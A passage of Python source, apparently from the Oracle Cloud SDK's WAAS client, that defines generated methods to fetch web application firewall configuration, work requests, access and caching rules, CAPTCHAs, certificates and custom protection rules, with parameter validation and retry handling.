By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.AddressRateLimiting`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_waf_address_rate_limiting.py.html>`__ to see an example of how to use get_waf_address_rate_limiting API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/addressRateLimiting"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_waf_address_rate_limiting got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="AddressRateLimiting")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="AddressRateLimiting")
def get_waf_config(self, waas_policy_id, **kwargs):
"""
Gets the Web Application Firewall configuration details for a WAAS policy.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.WafConfig`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_waf_config.py.html>`__ to see an example of how to use get_waf_config API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_waf_config got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WafConfig")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WafConfig")
def get_work_request(self, work_request_id, **kwargs):
"""
Gets the details of a specified work request.
:param str work_request_id: (required)
The `OCID`__ of the work request. This number is generated when work request is created.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.WorkRequest`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_work_request.py.html>`__ to see an example of how to use get_work_request API.
"""
resource_path = "/workRequests/{workRequestId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_work_request got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WorkRequest")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WorkRequest")
def list_access_rules(self, waas_policy_id, **kwargs):
"""
Gets the currently configured access rules for the Web Application Firewall configuration of a specified WAAS policy.
The order of the access rules is important. The rules will be checked in the order they are specified and the first matching rule will be used.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.AccessRule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_access_rules.py.html>`__ to see an example of how to use list_access_rules API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/accessRules"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_access_rules got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[AccessRule]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[AccessRule]")
def list_address_lists(self, compartment_id, **kwargs):
"""
Gets a list of address lists that can be used in a WAAS policy.
:param str compartment_id: (required)
The `OCID`__ of the compartment. This number is generated when the compartment is created.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param str sort_by: (optional)
The value by which address lists are sorted in a paginated 'List' call. If unspecified, defaults to `timeCreated`.
Allowed values are: "id", "name", "timeCreated"
:param str sort_order: (optional)
The value of the sorting direction of resources in a paginated 'List' call. If unspecified, defaults to `DESC`.
Allowed values are: "ASC", "DESC"
:param list[str] id: (optional)
Filter address lists using a list of address lists OCIDs.
:param list[str] name: (optional)
Filter address lists using a list of names.
:param list[str] lifecycle_state: (optional)
Filter address lists using a list of lifecycle states.
Allowed values are: "CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"
:param datetime time_created_greater_than_or_equal_to: (optional)
A filter that matches address lists created on or after the specified date-time.
:param datetime time_created_less_than: (optional)
A filter that matches address lists created before the specified date-time.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.AddressListSummary`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_address_lists.py.html>`__ to see an example of how to use list_address_lists API.
"""
resource_path = "/addressLists"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page",
"sort_by",
"sort_order",
"id",
"name",
"lifecycle_state",
"time_created_greater_than_or_equal_to",
"time_created_less_than"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_address_lists got unknown kwargs: {!r}".format(extra_kwargs))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["id", "name", "timeCreated"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"]
for lifecycle_state_item in kwargs['lifecycle_state']:
if lifecycle_state_item not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"compartmentId": compartment_id,
"id": self.base_client.generate_collection_format_param(kwargs.get("id", missing), 'multi'),
"name": self.base_client.generate_collection_format_param(kwargs.get("name", missing), 'multi'),
"lifecycleState": self.base_client.generate_collection_format_param(kwargs.get("lifecycle_state", missing), 'multi'),
"timeCreatedGreaterThanOrEqualTo": kwargs.get("time_created_greater_than_or_equal_to", missing),
"timeCreatedLessThan": kwargs.get("time_created_less_than", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[AddressListSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[AddressListSummary]")
def list_caching_rules(self, waas_policy_id, **kwargs):
"""
Gets the currently configured caching rules for the Web Application Firewall configuration of a specified WAAS policy.
The rules are processed in the order they are specified in and the first matching rule will be used when processing a request.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.CachingRuleSummary`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_caching_rules.py.html>`__ to see an example of how to use list_caching_rules API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/cachingRules"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_caching_rules got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[CachingRuleSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[CachingRuleSummary]")
def list_captchas(self, waas_policy_id, **kwargs):
"""
Gets the list of currently configured CAPTCHA challenges in the Web
Application Firewall configuration of a WAAS policy.
The order of the CAPTCHA challenges is important. The URL for each
CAPTCHA will be checked in the order they are created.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.Captcha`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_captchas.py.html>`__ to see an example of how to use list_captchas API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/captchas"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_captchas got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[Captcha]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[Captcha]")
def list_certificates(self, compartment_id, **kwargs):
"""
Gets a list of SSL certificates that can be used in a WAAS policy.
:param str compartment_id: (required)
The `OCID`__ of the compartment. This number is generated when the compartment is created.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param str sort_by: (optional)
The value by which certificate summaries are sorted in a paginated 'List' call. If unspecified, defaults to `timeCreated`.
Allowed values are: "id", "compartmentId", "displayName", "notValidAfter", "timeCreated"
:param str sort_order: (optional)
The value of the sorting direction of resources in a paginated 'List' call. If unspecified, defaults to `DESC`.
Allowed values are: "ASC", "DESC"
:param list[str] id: (optional)
Filter certificates using a list of certificates OCIDs.
:param list[str] display_name: (optional)
Filter certificates using a list of display names.
:param list[str] lifecycle_state: (optional)
Filter certificates using a list of lifecycle states.
Allowed values are: "CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"
:param datetime time_created_greater_than_or_equal_to: (optional)
A filter that matches certificates created on or after the specified date-time.
:param datetime time_created_less_than: (optional)
A filter that matches certificates created before the specified date-time.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.CertificateSummary`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_certificates.py.html>`__ to see an example of how to use list_certificates API.
"""
resource_path = "/certificates"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page",
"sort_by",
"sort_order",
"id",
"display_name",
"lifecycle_state",
"time_created_greater_than_or_equal_to",
"time_created_less_than"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_certificates got unknown kwargs: {!r}".format(extra_kwargs))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["id", "compartmentId", "displayName", "notValidAfter", "timeCreated"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"]
for lifecycle_state_item in kwargs['lifecycle_state']:
if lifecycle_state_item not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"compartmentId": compartment_id,
"id": self.base_client.generate_collection_format_param(kwargs.get("id", missing), 'multi'),
"displayName": self.base_client.generate_collection_format_param(kwargs.get("display_name", missing), 'multi'),
"lifecycleState": self.base_client.generate_collection_format_param(kwargs.get("lifecycle_state", missing), 'multi'),
"timeCreatedGreaterThanOrEqualTo": kwargs.get("time_created_greater_than_or_equal_to", missing),
"timeCreatedLessThan": kwargs.get("time_created_less_than", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[CertificateSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[CertificateSummary]")
def list_custom_protection_rules(self, compartment_id, **kwargs):
"""
Gets a list of custom protection rules for the specified Web Application Firewall.
:param str compartment_id: (required)
The `OCID`__ of the compartment. This number is generated when the compartment is created.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param str sort_by: (optional)
The value by which custom protection rules are sorted in a paginated 'List' call. If unspecified, defaults to `timeCreated`.
Allowed values are: "id", "compartmentId", "displayName", "modSecurityRuleId", "timeCreated"
:param str sort_order: (optional)
The value of the sorting direction of resources in a paginated 'List' call. If unspecified, defaults to `DESC`.
Allowed values are: "ASC", "DESC"
:param list[str] id: (optional)
Filter custom protection rules using a list of custom protection rule OCIDs.
:param list[str] display_name: (optional)
Filter custom protection rules using a list of display names.
:param list[str] lifecycle_state: (optional)
Filter Custom Protection rules using a list of lifecycle states.
Allowed values are: "CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"
:param datetime time_created_greater_than_or_equal_to: (optional)
A filter that matches Custom Protection rules created on or after the specified date-time.
:param datetime time_created_less_than: (optional)
A filter that matches custom protection rules created before the specified date-time.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.CustomProtectionRuleSummary`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_custom_protection_rules.py.html>`__ to see an example of how to use list_custom_protection_rules API.
"""
resource_path = "/customProtectionRules"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page",
"sort_by",
"sort_order",
"id",
"display_name",
"lifecycle_state",
"time_created_greater_than_or_equal_to",
"time_created_less_than"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_custom_protection_rules got unknown kwargs: {!r}".format(extra_kwargs))
if 'sort_by' in kwargs:
